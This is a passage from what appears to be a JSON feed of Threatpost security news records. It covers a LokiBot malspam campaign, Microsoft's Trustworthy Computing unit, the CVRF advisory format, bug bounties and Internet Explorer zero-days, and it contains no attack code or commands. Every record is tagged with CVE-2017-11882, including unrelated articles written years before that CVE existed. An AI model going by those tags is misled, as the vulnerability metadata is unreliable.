\n\u201cThe attack is pretty straightforward,\u201d said Fortinet researchers in a [Tuesday analysis of the attack](<https://www.fortinet.com/blog/threat-research/new-infostealer-attack-uses-lokibot.html>). \u201cThe LokiBot sample has a file size of 286 KB and was recently compiled on Aug 21, which is coincidentally the same date as when the malicious spam was sent\u2026. The spam email then encourages the user to open the attachment as the senders\u2019 colleague is currently out of office, and at the same time offers the potential victim some assurance that he/she can provide further clarification of the contents within the document if needed.\u201d\n\n## Red Flags\n\nDespite the spam email (titled \u201cUrgent Request for Quotation #RFQE67Y54\u201d) coming from a trusted sender, there were several tell-tale signs that might give away the email as malicious.\n\nWhile the email is \u201csimple in appearance,\u201d it contained language that appears to be written by a non-native English speaker and contained spelling errors. 
For instance, the email states, \u201cPlease see \u2018attache'\u201d, when referring to an \u201cRFQ\u201d (or a \u201crequest for quotation\u201d).\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2019/09/10083714/lokibot-malspam.png>)\n\nAnother giveaway is that a closer look at the attached file\u2019s information shows it to be curiously named \u201cDora Explorer Games,\u201d which is in reference to the children\u2019s TV heroine from the show \u201cDora The Explorer\u201d \u2013 a strange name for a file that purports to be related to manufacturing.\n\n\u201cWe don\u2019t know if this file info was put in there as a distraction or for reasons unknown to us, as it doesn\u2019t make sense to have such a file name targeting a military and government-based contractor,\u201d researchers said.\n\nOnce opened, the file actually harbors LokiBot malware, which is known for stealing a variety of credentials, including FTP credentials, stored email passwords, passwords stored in the browser, as well as a whole host of other credentials.\n\n## LokiBot Malware\n\nThe malware is known for being simple and effective and for its adoption of diverse attachment types. The malware is a commodity in underground markets, with versions selling for as little as $300.\n\n\u201cLokiBot is distributed in various forms, and has been seen in the past being distributed in zipped files along with malicious macros in Microsoft Word and Excel, or leveraging the exploit CVE-2017-11882 (Office Equation Editor) via malicious RTF files,\u201d said researchers.\n\nLokiBot is also known to be distributed in sneaky ways, including steganography. 
Several recent attacks in fact showed the malware [disguised as a .zipx attachment](<https://threatpost.com/lokibot-trojan-spotted-hitching-a-ride-inside-png-files/143491/>) hidden inside a .PNG file that can slip past some email security gateways, or hidden as an [ISO disk image file attachment](<https://threatpost.com/malspam-emails-blanket-lokibot-nanocore-malware-with-iso-files/145991/>).\n\nHowever, in the most recent campaign \u201cthis particular sample did not use any steganography as past variants were seen doing,\u201d researchers said.\n\n## Connected Spam Campaign\n\nUpon closer investigation, researchers were able to draw loose links between the campaign and a previous spam attack through the IP address.\n\nThe IP address of this attack is registered to a webhosting provider in Phoenix, Ariz. (called LeaseWeb USA), which was previously used twice before in malicious spam attacks that occurred in June.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2019/09/10094115/image_753132854.img_.png>)\n\nRelated June malspam campaign\n\nThese earlier attacks targeted a large German bakery in a malicious spam attack trying to lure a victim into downloading an electronic invoice. However, there were key differences between the two spam emails, including language (the previous email was in Chinese).\n\n\u201cBecause of the low volume identified, it appears that this IP address may be under the control of one group, and possibly only being used for very targeted attacks,\u201d researchers said. 
\u201cHowever, we can only assume this \u2013 time will provide a better historical snapshot of campaigns using this IP address.\u201d\n\nTo protect against similar future campaigns, researchers urged organizations to both adopt mail solutions as well as train their employees to look out for spearphishing attempts.\n\n\u201cSince it has been reported that this threat has been delivered via social engineering distribution mechanisms, it is crucial that end users within an organization are made aware of various types of attacks delivered via social engineering,\u201d researchers said. \u201cThis can be accomplished through regularly-occurring training sessions and impromptu tests using predetermined templates by internal security departments within an organization.\u201d\n", "cvss3": {}, "published": "2019-09-10T14:07:03", "type": "threatpost", "title": "U.S. Manufacturer Most Recent Target of LokiBot Malspam Campaign", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2019-09-10T14:07:03", "id": "THREATPOST:0234DE925A24BDFF85D569B0592C4E40", "href": "https://threatpost.com/u-s-manufacturer-most-recent-target-of-lokibot-malspam-campaign/148153/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2018-10-06T22:58:07", "description": "In a move that has surprised many in the security community, Microsoft has disbanded its Trustworthy Computing unit, the group that was responsible for the pioneering work that helped reverse the company\u2019s security reputation and make Windows a much more secure and reliable computing platform.\n\nThe end of the TwC group comes as Microsoft is in the middle of a major shift. The company on Thursday announced it was laying off 2,100 employees and also that it was closing its research facility in Silicon Valley. 
Under the changes in the security group at Microsoft, some of the TwC employees will be reassigned to the Cloud and Enterprise division and others will wind up in the legal group. The move presumably is an effort to integrate the security and privacy expertise in the TwC group into the rest of the company.\n\nThe break-up of the TwC group marks the end of an era at Microsoft, an era that began with the [memo that Bill Gates sent](<https://threatpost.com/ten-years-after-gatess-memo-effects-still-being-felt-011212/76089>) to company employees in January 2002. Microsoft had been under fire from some of its larger customers\u2013government agencies, financial companies and others\u2013about the security problems in Windows, issues that were being brought front and center by a series of self-replicating worms and embarrassing attacks. Gates realized that the company was in danger of losing a large chunk of business if it didn\u2019t start making some changes regarding security, so he made the development of more secure products and platforms a top priority for all of Microsoft.\n\nThat began with putting developers through security training and also included stopping production on a major update to Windows in order to get the security of it right. It continued with Microsoft hiring security researchers, privacy experts and top software security people and eventually led to the creation of the Trustworthy Computing group. Gates\u2019s memo contemplated many of the changes that would come to computing, as well as the threats that would emerge.\n\n\u201cIn the past, we\u2019ve made our software and services more compelling for users by adding new features and functionality, and by making our platform richly extensible. We\u2019ve done a terrific job at that, but all those great features won\u2019t matter unless customers trust our software. So now, when we face a choice between adding features and resolving security issues, we need to choose security. 
Our products should emphasize security right out of the box, and we must constantly refine and improve that security as threats evolve. A good example of this is the changes we made in Outlook to avoid email borne viruses. If we discover a risk that a feature could compromise someone\u2019s privacy, that problem gets solved first. If there is any way we can better protect important data and minimize downtime, we should focus on this. These principles should apply at every stage of the development cycle of every kind of software we create, from operating systems and desktop applications to global Web services,\u201d he wrote in the [memo](<http://www.computerbytesman.com/security/billsmemo.htm>).\n\n\u201cGoing forward, we must develop technologies and policies that help businesses better manage ever larger networks of PCs, servers and other intelligent devices, knowing that their critical business systems are safe from harm. Systems will have to become self-managing and inherently resilient. We need to prepare now for the kind of software that will make this happen, and we must be the kind of company that people can rely on to deliver it.\u201d\n\nOver the years, the TwC group accomplished much of that, and more. Breaking the group up may disperse into the rest of the company the expertise that\u2019s been concentrated in TwC, enabling the security experts to work more closely with the engineering teams and other groups inside the company. Or it may lead to an exodus of talent from Redmond. Either way, it signals a turning point for Microsoft and its decade-long effort to make security a priority. Computing has evolved dramatically in that time, as have Microsoft\u2019s product offerings, priorities and challenges. 
Microsoft\u2019s decision to eliminate the TwC group is just another indication of those changing times.\n", "cvss3": {}, "published": "2014-09-19T11:43:52", "type": "threatpost", "title": "Era Ends With Break Up of Trustworthy Computing Group at Microsoft", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2014-09-23T19:58:40", "id": "THREATPOST:90355E85731E1618F6C63A58CD426966", "href": "https://threatpost.com/era-ends-with-break-up-of-trustworthy-computing-group-at-microsoft/108404/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:03:03", "description": "Since the beginning of recorded time, security researchers, software vendors and hackers have been issuing security advisories in all kinds of nutty formats. Some feature excellent ASCII art, some have clever inside jokes and some come from Microsoft. Now, there\u2019s an effort underway, called the Common Vulnerability Reporting Framework, to standardize the way that vulnerabilities are reported so that they\u2019re in a common, machine-readable format. \n\nThe [CVRF](<http://www.icasi.org/cvrf>) is the product of a group called the Industry Consortium for Advancement of Security on the Internet, and Microsoft in May for the first time produced its monthly Patch Tuesday advisories in the CVRF format. The company said that while the CVRF itself is still in its initial stages and will continue to evolve, the current version should give enterprise customers a good option for automating bulletin deployment. \n\n\u201cFor many customers, a machine-readable markup framework for security releases might not be a pressing need. For instance, home-computer users or small businesses may choose to install security updates automatically. 
However, many business customers spend time \u201ccopying and pasting\u201d our security bulletin content into their risk management systems, spreadsheets and corporate notification emails manually as part of their IT security compliance and remediation task list,\u201d [Microsoft\u2019s Mike Reavey](<http://blogs.technet.com/b/msrc/archive/2012/05/17/microsoft-security-updates-and-the-common-vulnerability-reporting-framework.aspx>) said in a blog post on CVRF.\n\n\u201cFor these customers, this machine-readable format may enable more efficiency and automation. Faster and more efficient guidance for these customers means they can more quickly ensure protection, which is always our goal. For those that do not require automation, we will continue to offer our bulletins in the current format.\u201d\n\nICASI members include IBM, Cisco, Juniper, Nokia and Amazon, among other companies. The current version of CVRF is 1.1, the second iteration, and the framework will continue to change as users provide feedback and requirements evolve.\n\n\u201cCVRF was created to fill a major gap in vulnerability standardization: the lack of a standard framework for the creation of vulnerability report documentation. 
Although the computer security community had made significant progress in several other areas, including categorizing and ranking the severity of vulnerabilities in information systems with the widespread adoption of the Common Vulnerabilities and Exposures (CVE) dictionary and the Common Vulnerability Scoring System (CVSS), this lack of standardization was evident in every vulnerability report, best practice document, or security bulletin released by any vendor or coordinator,\u201d the CVRF documentation says.\n", "cvss3": {}, "published": "2012-05-18T17:52:11", "type": "threatpost", "title": "Microsoft Adopts CVRF Format for Security Bulletins", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:32:13", "id": "THREATPOST:A21BD1B60411A9861212745052E23AE7", "href": "https://threatpost.com/microsoft-adopts-cvrf-format-security-bulletins-051812/76582/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:04:33", "description": "Computer users are taking steps to mitigate online security threats, but still only score a paltry 34 out of 100 \u2013 a solid \u201cF\u201d \u2013 according to a new study by Microsoft. \n\nThe study, sponsored by [Microsoft\u2019s Trustworthy Computing Group](<http://www.microsoft.com/about/twc/en/us/default.aspx>) (TwC), introduces a new metric, the [Microsoft Computing Safety Index](<http://www.microsoft.com/security/resources/mcsi.aspx>) (MCSI) to measure online safety, but finds that consumers are having trouble getting past the basics when it comes to staying safe on the Internet.\n\nThe MCSI assigns a point value to a series of steps (more than 20 in all) that consumers can take to protect themselves online. 
Each point in turn is assigned to a tier of activity: Foundational (30 points), Technical (40 points) and Behavioral (30 points).\n\nActions like keeping strong passwords and choosing reputable Web sites fall under the Behavioral tier. Using a firewall, maintaining anti-virus software and running regular updates fall under the Foundational tier. The more steps you take, the higher your MCSI score, with 100 being the highest score possible.\n\nMicrosoft polled consumers in the U.S., U.K., Germany, France and Brazil in what the company called a \u2018benchmark survey.\u2019 The average MCSI from that poll, 34, suggests users have the basics covered but have left lots of room to improve, Microsoft said.\n\nAmong the five countries, 55 percent of users use automatic computer updates and roughly 90 percent of those surveyed use anti-virus protection. Conversely, only 26 percent of users said they had confidence in their PC security software while only eleven percent agreed \u201cgood digital citizens\u201d are winning the war against hackers.\n\nThe metric was developed in conjunction with the upcoming 10-year anniversary of the [Trustworthy Computing Group](<https://threatpost.com/katie-moussouris-microsoft-trustworthy-computing-and-evolution-security-community-031611/>) next year and was released as October, [National Cyber Security Awareness Month](<https://threatpost.com/president-obama-national-cybersecurity-awareness-month-101909/>), winds down.\n", "cvss3": {}, "published": "2011-10-27T21:22:26", "type": "threatpost", "title": "Microsoft Invents New Way To Measure Online Safety (And Finds That Consumers Stink At It)", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:33:29", "id": "THREATPOST:11053DD231ACA5F34708B38E7E96AE9F", "href": "https://threatpost.com/microsoft-invents-new-way-measure-online-safety-and-finds-consumers-stink-it-102711/75813/", "cvss": {"score": 9.3, "vector": 
"AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:57:28", "description": "Microsoft earlier this week published [a 25-page framework](<http://blogs.microsoft.com/cybertrust/2015/01/27/putting-information-sharing-into-context/>) offering guidance on how to effectively share information and what kinds of information need to be shared in order to reduce overall risk.\n\n[Information sharing](<http://threatpost.com/information-sharing-on-threats-seen-as-a-key-for-auto-makers/108185>) has been an oft-repeated refrain in security and policy-making circles for the better part of the last decade. There have been [draft bills](<http://threatpost.com/senate-draft-bill-to-protect-threat-information-sharing/105769>), [sharing platforms](<http://threatpost.com/microsoft-to-preview-interflow-information-sharing-platform/106798>) and every kind of [appeal](<http://threatpost.com/nsas-alexander-appeals-for-threat-information-sharing/102404>), [encouragement](<http://threatpost.com/regulator-warns-banks-about-ddos-attacks-encourages-information-sharing-122712/77349>) and assurance; yet there have also been quiet mutterings that organizations simply do not want to share information for a variety of reasons, not limited to competition concerns and personal embarrassment. In theory, sharing information and building a sort of defensive cooperative seems simple enough. However, the reality is that we are still talking about threat information sharing like it isn\u2019t happening despite the fact that it\u2019s a perpetual topic of discussion at nearly every corporate and government security conference.\n\nMicrosoft\u2019s framework seeks to define all the parties that need to be involved in any comprehensive information sharing exchange as well as the types of information that those groups need to be sharing. 
In addition to knowing with whom to share what information, Microsoft\u2019s document offers insight into designing methods, mechanisms and models for data sharing exchanges.\n\nBroadly speaking, Microsoft advises that organizations develop an overarching strategy for information sharing and collaboration with built-in privacy protections and well-established governance processes. Sharing, they say, should focus on actionable threat, vulnerability and mitigation information. Organizations need to build relationships in order to enable voluntary, trust-based information sharing, whereas mandatory sharing should remain limited. Once information is being shared, companies must ensure they are using that information to its full potential. Beyond these, Microsoft says there needs to be a voluntary, global exchange of emerging best practices.\n\nPerhaps not quite as broadly as best practices, Microsoft is encouraging that information-sharing exchanges of varying degrees of openness discuss successful attacks, including the information lost, techniques used, intent, and impact. They should also trade information about potential future threats and exploitable vulnerabilities and ways of mitigating bugs ahead of patch releases. Executive-level situational awareness, which could allow organizations to respond more quickly to attacks, as well as strategic analysis of threats faced and information sought by attackers, should be shared too.\n\nMicrosoft says there are basically six categories of people to include in exchanges: governments, private critical infrastructure firms, enterprises, information technology, security companies and security researchers.\n\nMicrosoft encourages efforts by policymakers to construct legislation that would encourage information sharing. 
However, trust between those incorporated into information sharing exchanges, the computer company says, is critically important.\n\n\u201cLaws can compel incident reporting,\u201d Microsoft notes, \u201cbut they do not increase trust or collaboration nor do they reduce risks.\u201d\n\nExchange models can be voluntary or mandatory, though Microsoft explains that the former is the richer model. Microsoft favors voluntary sharing models because they serve to increase the level of trust between partners. On the other hand, mandatory models could shift the focus from smart collaborative defense to companies merely reporting threat-related information for the sake of reporting it because they are required to do so.\n\nIn terms of exchange methodology, organizations and groups thereof need to consider the level of formality of their network. Formal exchanges are generally based on contractual or non-disclosure agreements while less formal, ad hoc exchanges are generally event-specific. Subsets of formalized exchanges will be necessarily based on security clearance levels while less formalized groups of like-minded organizations can share information with one another based entirely on trust within the group.\n\n\u201cHigh-quality strategic information can help to project where the next classes of cyber-threats may come from and to identify the incentives that could motivate future attackers, along with the technologies they may target,\u201d Microsoft says. 
\u201cAdditionally, strategic analysis can help put incidents into a broader context and can drive internal changes, enhancing the ability of any public or private organization to update risk management practices that reduce its exposure to risk.\u201d\n\nInformation sharing, Microsoft\u2019s Cristin Goodwin and J. Paul Nicholas explain, is not merely a human-to-human exercise but must also be automated between machines to some degree.\n\n\u201cAmong security professionals, there is currently a lot of focus on developing systems that automate the exchange of information,\u201d Microsoft wrote. \u201cIt is believed that such systems enable actors not only to identify information important to them more quickly, but also to automate mitigations to threats as they occur.\u201d\n", "cvss3": {}, "published": "2015-01-29T13:58:34", "type": "threatpost", "title": "Microsoft Publishes Information Sharing Framework", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2015-02-03T14:05:30", "id": "THREATPOST:6CF438E98DFFF4B4057CAFB1382A4D3C", "href": "https://threatpost.com/microsoft-publishes-information-sharing-guidelines/110740/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:59:41", "description": "Microsoft announced yesterday that it will complement the [two-factor authentication](<http://threatpost.com/microsoft-reportedly-adding-two-factor-authentication-user-accounts-041013>) it enabled for account holders in April with [additional security features](<http://blogs.technet.com/b/microsoft_blog/archive/2013/12/09/new-security-features-added-to-microsoft-accounts.aspx>) designed to deny account hijacking and unauthorized access.\n\nWindows PC and mobile users, along with Outlook, SkyDrive, Xbox, Skype and other Microsoft services users will soon have three new capabilities to further prop up their accounts.\n\nThe most novel may be a dashboard view that 
presents a user with a log of recent activity, such as log-in attempts\u2014including failed attempts\u2014as well as the addition or deletion of security information and the type of device and browser used for a particular activity. Location is displayed on a map, as well as timestamp data.\n\n\u201cYou know best what\u2019s been happening with your account \u2013 so the more we give you tools to understand what\u2019s happening, the better we can work together to protect your account,\u201d wrote Eric Doerr, a group program manager at Microsoft. \u201cFor example, a login from a new country might look suspicious to us, but you might know that you were simply on vacation or on a business trip.\u201d\n\nUsers who determine there has been suspicious or unauthorized activity can click on a \u201cThis wasn\u2019t me\u201d button that will then display steps the user can take to secure their accounts.\n\nIn addition, users who have already enabled [two-factor authentication](<http://blogs.technet.com/b/microsoft_blog/archive/2013/04/17/microsoft-account-gets-more-secure.aspx>) will be able to generate a recovery code to access their accounts without having to use the information provided during the setup of two-factor.\n\n\u201cBecause two-step verification setup requires two verified pieces of security information, like a phone number and email address, it will be a rare occasion when both options fail, but in the event they do, we\u2019ve got you covered,\u201d Doerr said.\n\nMicrosoft said that any account user will be able to add a recovery code to their account, but users will be able to request only one recovery code at a time; requesting a new one cancels the old one, Doerr said.\n\n\u201cYour recovery code is like a spare key to your house,\u201d Doerr said. \u201cSo make sure you store it in a safe place.\u201d\n\nThe final new feature users may expect is additional management of security notifications, such as password resets. 
Users will be able to select, for example, whether they want security notifications sent to an email address or a mobile device via text message.\n\nMicrosoft account holders have had two-factor authentication at their disposal since April. Users are asked to provide two pieces of security information that Microsoft stores; the user will enter a password, for example, and then have a code sent to their mobile device as a second authenticator.\n\nMicrosoft also released an Authenticator app for Windows Phone; the app is built on a standard authentication protocol meaning that it could be used on other Web-based services such as those offered by Google, Dropbox and others.\n", "cvss3": {}, "published": "2013-12-10T08:00:18", "type": "threatpost", "title": "Microsoft Protects User Accounts with New Security Features", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-12-10T00:55:21", "id": "THREATPOST:D3F6B40A3A2EF494FE7F0AFC7768F7CD", "href": "https://threatpost.com/microsoft-adds-new-security-features-to-accounts/103138/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:06:42", "description": "[](<https://threatpost.com/barracuda-networks-launches-bug-bounty-program-110910/>)Following the lead of Mozilla and Google, Barracuda Networks is launching a bug bounty program that will pay out cash rewards for vulnerabilities found in the company\u2019s own products.\n\nThe move by Barracuda, a maker of mail security and data protection products, is the first such bug bounty program offered by a pure security technology vendor. Mozilla and Google are the two most prominent examples of general technology companies that offer rewards for vulnerabilities, and both of those companies have seen their programs succeed in the last year. 
In fact, both Google and Mozilla have raised the prices that they pay for the most severe bugs, with [Mozilla shelling out up to $3,000](<https://threatpost.com/mozilla-bumps-bug-bounty-3000-071610/>) and [Google paying as much as $3,133.7 for bugs](<https://threatpost.com/google-ups-bug-bounty-ante-313370-072010/>).\n\nBarracuda officials said they\u2019ll match Google\u2019s top price for severe bugs and the minimum bug bounty will be $500. The company will only pay out rewards for bugs that are disclosed privately to Barracuda, although once the bug is fixed, the researcher is free to disclose it publicly. Bugs found in Barracuda\u2019s Spam and Virus Firewall, Web Filter, Web Application Firewall and NG Firewall are eligible for the cash rewards.\n\nBugs that are in scope for the reward program are vulnerabilities that compromise confidentiality, availability, integrity or authentication. Those would include vulnerabilities such as remote exploits, privilege escalation, cross site scripting, code execution and command injection.\n\n\u201cSecurity product vendors should be at the forefront of promoting security research,\u201d Paul Judge, chief research officer at Barracuda Networks, said in a statement. \u201cThis initiative reflects our commitment to our customers and the security community at large. The goal of this program is to reward researchers for their hard work as well as to promote and encourage responsible disclosure.\u201d\n\nAs a profitable, legitimate market for vulnerability information has developed in recent years with the success of the Zero Day Initiative and other third-party brokers, there has been more and more pressure on the vendors themselves to pay for bugs. 
\n\nWhile Mozilla and Google officials have been happy with the results of their bug bounty programs\u2013[Google in fact just expanded its program to its web properties](<https://threatpost.com/google-extends-bug-bounty-web-properties-110110/>)\u2013and researchers have praised the companies for recognizing their work, other high-profile software vendors have stayed on the sidelines. Microsoft officials have repeatedly said that the company will not pay for bugs and Apple and Adobe, which have been under increased scrutiny by attackers and researchers of late, have not offered bounties either.\n", "cvss3": {}, "published": "2010-11-09T14:28:15", "type": "threatpost", "title": "Barracuda Networks Launches Bug Bounty Program", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2018-08-15T10:14:41", "id": "THREATPOST:0273E2F0D7B4CECA41893B066B3C2D24", "href": "https://threatpost.com/barracuda-networks-launches-bug-bounty-program-110910/74652/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:08:10", "description": "[](<https://threatpost.com/ms-discovers-over-1800-office-2010-bugs-033110/>)Microsoft uncovered more than 1,800 bugs in Office 2010 by tapping into the unused computing horsepower of idling PCs. Office developers found the bugs by running millions of \u201cfuzzing\u201d tests, said Tom Gallagher, senior security test lead with Microsoft\u2019s Trustworthy Computing group. [Read the full article](<http://www.computerworld.com/s/article/9174539/Microsoft_runs_fuzzing_botnet_finds_1_800_Office_bugs>). 
[Computerworld]\n", "cvss3": {}, "published": "2010-03-31T21:11:20", "type": "threatpost", "title": "MS Discovers Over 1,800 Office 2010 Bugs", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2018-08-15T13:06:49", "id": "THREATPOST:6E19885760DF8E9DD66B4F30158CD173", "href": "https://threatpost.com/ms-discovers-over-1800-office-2010-bugs-033110/73767/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:08:16", "description": "[](<https://threatpost.com/microsoft-issues-fix-it-workaround-ie-zero-day-031510/>)Microsoft has released a one-click \u201cfix-it\u201d workaround to help Internet Explorer users block malware attacks against an unpatched browser vulnerability.\n\nThe Fix-It workaround, [available here](<http://support.microsoft.com/kb/981374>), effectively disables peer factory in the iepeers.dll binary in affected versions of Internet Explorer. \n\nThe workaround comes on the heels of the [public release of exploit code](<https://threatpost.com/exploit-code-published-latest-ie-zero-day-031010/>) into the freely available Metasploit pen-testing framework.\n\nMicrosoft acknowledged the availability of exploit code for the issue and again urged users to upgrade to Internet Explorer 8, which is not vulnerable to this issue.\n\nThe company urged IE users to test the Fix-It workaround thoroughly before deploying as certain functionality that depends on the peer factory class, such as printing from Internet Explorer and the use of web folders, may be affected.\n\nMicrosoft also [confirmed](<http://blogs.technet.com/msrc/archive/2010/03/12/update-on-security-advisory-981374.aspx>) it is considering an out-of-band emergency patch to correct the underlying flaw.\n\nWe have seen speculation that Microsoft might release an update for this issue out-of-band. I can tell you that we are working hard to produce an update which is now in testing. 
This is a critical and time intensive step of the process as the update must be tested against all affected versions of Internet Explorer on all supported versions of Windows. Additionally, each supported language version needs to be tested as well as testing against thousands of third party applications. We never rule out the possibility of an out-of-band update. When the update is ready for broad distribution, we will make that decision based on customer needs. \n\nMalicious hackers are already exploiting the vulnerability to launch targeted attacks. The earliest attacks include the use of a backdoor that allows complete access to a vulnerable machine.\n\nThe backdoor allows an attacker to perform various functions on the compromised system, including uploading and downloading files, executing files, and terminating running processes.\n", "cvss3": {}, "published": "2010-03-15T14:17:12", "type": "threatpost", "title": "Microsoft Issues Fix-It Workaround for IE Zero-Day", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2018-08-15T13:14:29", "id": "THREATPOST:14B2B02CB661C8C7E1BC1204495F0D25", "href": "https://threatpost.com/microsoft-issues-fix-it-workaround-ie-zero-day-031510/73686/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:08:24", "description": "[](<https://threatpost.com/microsoft-warns-new-ie-code-execution-flaw-030110/>)Microsoft\u2019s security response team is investigating reports of a potentially dangerous code execution vulnerability in its flagship Internet Explorer browser.\n\nThe company warned that an attacker could host a maliciously crafted web page and run arbitrary code if they could convince a user to visit the web page and then get them to press the F1 key in response to a pop up dialog box.\n\nMicrosoft\u2019s Jerry Bryant said the company is not aware of any attacks related to this vulnerability.\n\n\u201cWe have 
determined that users running Windows 7, Windows Server 2008 R2, Windows Server 2008, and Windows Vista, are not affected by this issue,\u201d Bryant said.\n\nFrom [the MSRC blog](<http://blogs.technet.com/msrc/archive/2010/02/28/investigating-a-new-win32hlp-and-internet-explorer-issue.aspx>): \n\nThe issue in question involves the use of VBScript and Windows Help files in Internet Explorer. Windows Help files are included in a long list of what we refer to as \u201cunsafe file types\u201d. These are file types that are designed to invoke automatic actions during normal use of the files. While they can be very valuable productivity tools, they can also be used by attackers to try and compromise a system. \n\nAlthough this issue has been publicly documented, Microsoft has not yet provided pre-patch mitigation guidance or workarounds for affected customers.\n", "cvss3": {}, "published": "2010-03-01T14:26:26", "type": "threatpost", "title": "Microsoft Warns of New IE Code Execution Flaw", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2018-08-15T13:22:38", "id": "THREATPOST:370DCA5103923FA8965F6D8890D4198F", "href": "https://threatpost.com/microsoft-warns-new-ie-code-execution-flaw-030110/73602/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:08:46", "description": "[ \n \n](<http://go.microsoft.com/fwlink/?LinkID=124807>)\n\nJonathan Ness of Microsoft\u2019s Security Research and Defense team explains the inner workings of the Data Execution Prevention technology that can help mitigate the [targeted attacks exploiting the vulnerability in Internet Explorer](<https://threatpost.com/how-dep-can-mitigate-ie-zero-day-attacks-011910/>) right now.\n", "cvss3": {}, "published": "2010-01-19T14:32:51", "type": "threatpost", "title": "How DEP Can Mitigate IE Zero-Day Attacks", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": 
"2013-04-17T16:38:06", "id": "THREATPOST:1B56CE326878B69FFA20FFC20DB62365", "href": "https://threatpost.com/how-dep-can-mitigate-ie-zero-day-attacks-011910/73391/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:08:47", "description": "[](<https://threatpost.com/attacks-continuing-against-ie-flaw-microsoft-preps-patch-011810/>)Microsoft officials said on Sunday that they are continuing to investigate the attacks that are exploiting the unpatched flaw in Internet Explorer, but that the attacks right now are limited to specifically targeted activity against enterprise networks.\n\nThe company said that it doesn\u2019t look like any of the attacks are being targeted at consumers, and that they are only effective against machines running IE 6, which doesn\u2019t include many of the advanced memory protections that are part of IE7 and IE8. [Microsoft is recommending](<http://blogs.technet.com/msrc/>) that customers running older versions of Windows XP and IE6 upgrade in order to take advantage of those memory protections.\n\nThat said, we remain vigilant about this threat evolving and want to be \nsure our customers take appropriate action to protect themselves. That \nis why we continue to recommend that customers using IE6 or IE7, [upgrade to IE8](<http://www.microsoft.com/downloads/details.aspx?FamilyID=68C48DAD-BC34-40BE-8D85-6BB4F56F5110&displaylang=en>) \nas soon as possible to benefit from the improved security protections \nit offers. Customers who are using Windows XP SP2 should be sure to \nupgrade to both IE8 and enable Data Execution Protection (DEP), or [upgrade to Windows XP SP3](<http://support.microsoft.com/kb/322389>) \nwhich enables DEP by default, as soon as possible. 
Additionally, customers should consider implementing the workarounds and mitigations provided in the Security Advisory.\n\nMicrosoft\u2019s next scheduled patch release isn\u2019t until mid-February, but given that there is public exploit code available and that the vulnerability has been used in known attacks, the company could release an emergency out-of-band patch before then.\n", "cvss3": {}, "published": "2010-01-18T14:11:24", "type": "threatpost", "title": "Attacks Continuing Against IE Flaw as Microsoft Preps Patch", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2018-08-15T13:42:32", "id": "THREATPOST:A2FCDF5F534EC09A258F3193FDEA41A8", "href": "https://threatpost.com/attacks-continuing-against-ie-flaw-microsoft-preps-patch-011810/73380/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:08:47", "description": "According to a posting on the CPAN Testers\u2019 blog, the CPAN Testers\u2019 server is being aggressively scanned by \u201c20-30 bots every few seconds\u201d in what they call \u201ca dedicated denial of service attack\u201d; these bots \u201ccompletely ignore the rules specified in robots.txt\u201d. [Read the full article](<http://www.h-online.com/security/news/item/Microsoft-bots-perform-denial-of-service-on-Perl-Testers-906094.html>). 
